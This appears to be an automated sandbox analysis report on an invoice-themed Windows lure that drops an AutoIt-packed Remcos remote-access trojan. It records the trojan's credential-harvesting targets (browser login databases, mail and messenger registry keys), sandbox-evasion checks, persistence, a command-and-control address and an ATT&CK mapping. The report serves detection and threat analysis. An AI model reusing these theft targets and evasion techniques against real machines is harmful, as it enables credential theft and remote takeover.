Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F43F09 BlockInput, 0_2_00F43F09
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00ED3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00ED3B3A
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F05A7C RtlEncodePointer,RtlEncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,GetProcAddress,RtlEncodePointer,IsDebuggerPresent,OutputDebugStringW,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer,RtlDecodePointer, 0_2_00F05A7C
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_01027A50 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect, 0_2_01027A50
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_01170358 mov eax, dword ptr fs:[00000030h] 0_2_01170358
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_011703B8 mov eax, dword ptr fs:[00000030h] 0_2_011703B8
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_0116ECB6 mov eax, dword ptr fs:[00000030h] 0_2_0116ECB6
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_0116ECC8 mov eax, dword ptr fs:[00000030h] 0_2_0116ECC8
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00FF32C8 mov eax, dword ptr fs:[00000030h] 2_2_00FF32C8
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00FF3328 mov eax, dword ptr fs:[00000030h] 2_2_00FF3328
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00FF1C38 mov eax, dword ptr fs:[00000030h] 2_2_00FF1C38
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00FF1C26 mov eax, dword ptr fs:[00000030h] 2_2_00FF1C26
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F280A9 GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation, 0_2_00F280A9
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00EFA155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00EFA155
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00EFA124 SetUnhandledExceptionFilter, 0_2_00EFA124
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D0A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00D0A155
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D0A124 SetUnhandledExceptionFilter, 2_2_00D0A124

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Section loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Section loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and write
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Section loaded: NULL target: C:\Users\user\AppData\Local\acceptancy\turbinals.exe protection: execute and read and write
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F287B1 LogonUserW, 0_2_00F287B1
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00ED3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00ED3B3A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00ED48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00ED48D7
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F34C7F mouse_event, 0_2_00F34C7F
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F27CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00F27CAF
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F2874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00F2874B
                    Source: z49FACTURA-0987678.exe, 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp, turbinals.exe, 00000002.00000002.1311968489.0000000000D94000.00000040.00000001.01000000.00000004.sdmp, turbinals.exe, 00000003.00000002.3756168869.0000000000D94000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerG
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager
                    Source: z49FACTURA-0987678.exe, turbinals.exe Binary or memory string: Shell_TrayWnd
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager05\
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manager05\38i
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program ManagerX
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Manageru
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerk|
                    Source: turbinals.exe, 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                    Source: turbinals.exe, 00000003.00000002.3759331441.0000000001551000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000002.3758537352.00000000014EA000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.dr Binary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00EF862B cpuid 0_2_00EF862B
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Queries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F04E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F04E87
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F11E06 GetUserNameW, 0_2_00F11E06
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F03F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00F03F3A
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00ED49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00ED49A0
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: turbinals.exe, 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1312007585.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000003.00000003.1311883235.000000000155C000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1428885907.00000000011AC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000002.1437261623.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000009.00000003.1429031274.000000000121E000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 0000000A.00000002.1447997256.0000000001233000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procmon.exe

                    Stealing of Sensitive Information

                    Source: Yara match File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\places.sqlite
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7940, type: MEMORYSTR
                    Source: turbinals.exe Binary or memory string: WIN_81
                    Source: turbinals.exe Binary or memory string: WIN_XP
                    Source: turbinals.exe Binary or memory string: WIN_XPe
                    Source: turbinals.exe Binary or memory string: WIN_VISTA
                    Source: turbinals.exe Binary or memory string: WIN_7
                    Source: turbinals.exe Binary or memory string: WIN_8
                    Source: turbinals.exe, 0000000D.00000002.1464688620.0000000000D94000.00000040.00000001.01000000.00000004.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

                    Remote Access Functionality

                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
                    Source: Yara match File source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000003.00000002.3760192225.000000000169F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3758537352.00000000014B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3758634982.00000000014F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3760107455.00000000015CD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3761526456.000000000402F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.1465257785.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F46283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 0_2_00F46283
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F46747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00F46747
                    Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe Code function: 0_2_00F07AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset, 0_2_00F07AA1
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00D56283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 2_2_00D56283
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00D56747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 2_2_00D56747
                    Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe Code function: 2_2_00D17AA1 RpcBindingSetOption,_LocaleUpdate::_LocaleUpdate,_memset,WideCharToMultiByte,GetLastError,_memset, 2_2_00D17AA1
                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                    Gather Victim Identity Information | 111 Scripting | 2 Valid Accounts | 2 Native API | 111 Scripting | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 2 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
                    Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                    Email Addresses | DNS Server | Domain Accounts | At | 2 Valid Accounts | 2 Valid Accounts | 21 Obfuscated Files or Information | 1 Credentials in Registry | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Remote Access Software | Automated Exfiltration | Data Encrypted for Impact
                    Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Registry Run Keys / Startup Folder | 21 Access Token Manipulation | 1 Software Packing | 1 Credentials In Files | 28 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                    Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 112 Process Injection | 1 DLL Side-Loading | LSA Secrets | 241 Security Software Discovery | SSH | 3 Clipboard Data | 12 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                    Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 2 Registry Run Keys / Startup Folder | 1 Masquerading | Cached Domain Credentials | 1 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                    DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Valid Accounts | DCSync | 4 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                    Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                    Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                    IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 112 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    Behavior Graph ID: 1567452  Sample: z49FACTURA-0987678.exe  Startdate: 03/12/2024  Architecture: WINDOWS  Score: 100
                    Start: DNS geoplugin.net; Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
                      z49FACTURA-0987678.exe [10] started
                        dropped: C:\Users\user\AppData\Local\...\turbinals.exe, PE32
                        Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        turbinals.exe [16] started
                          dropped: C:\Users\user\AppData\...\turbinals.vbs, data
                          Multi AV Scanner detection for dropped file; Binary is likely a compiled AutoIt script file; Machine Learning detection for dropped file; 2 other signatures
                          turbinals.exe [22] started
                            network: 192.210.150.26, 49703, 49704, 8787 AS-COLOCROSSINGUS United States
                            network: geoplugin.net 178.237.33.50, 49710, 80 ATOM86-ASATOM86NL Netherlands
                            dropped: C:\ProgramData\remcos\logs.dat, data
                            Detected Remcos RAT; Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Maps a DLL or memory area into another process
                            turbinals.exe [29] started: Tries to steal Instant Messenger accounts or passwords; Tries to harvest and steal browser information (history, passwords, etc)
                            turbinals.exe [32] started: Tries to steal Mail credentials (via file / registry access)
                            turbinals.exe [34] started
                      wscript.exe [14] started
                        Windows Scripting host queries suspicious COM object (likely to drop second stage)
                        turbinals.exe [20] started
                          turbinals.exe [27] started
                            turbinals.exe [36] started: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                              turbinals.exe [38] started: Detected Remcos RAT; Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Antivirus detection: sample
Source | Detection | Scanner | Label
z49FACTURA-0987678.exe | 26% | ReversingLabs | Win32.Trojan.AutoitInject
z49FACTURA-0987678.exe | 100% | Joe Sandbox ML |

Antivirus detection: dropped files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\acceptancy\turbinals.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\acceptancy\turbinals.exe | 26% | ReversingLabs | Win32.Trojan.AutoitInject

Antivirus detection: unpacked PE files
No Antivirus matches

Antivirus detection: domains
No Antivirus matches

Antivirus detection: URLs
Source | Detection | Scanner | Label
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?82954a9491e844512441fcdc | 0% | Avira URL Cloud | safe
https://d0682b2d8bbebf21dab46160329925d6.azr.footprintdns.com/apc/trans.gif?8595da0e88f921ab00454191 | 0% | Avira URL Cloud | safe
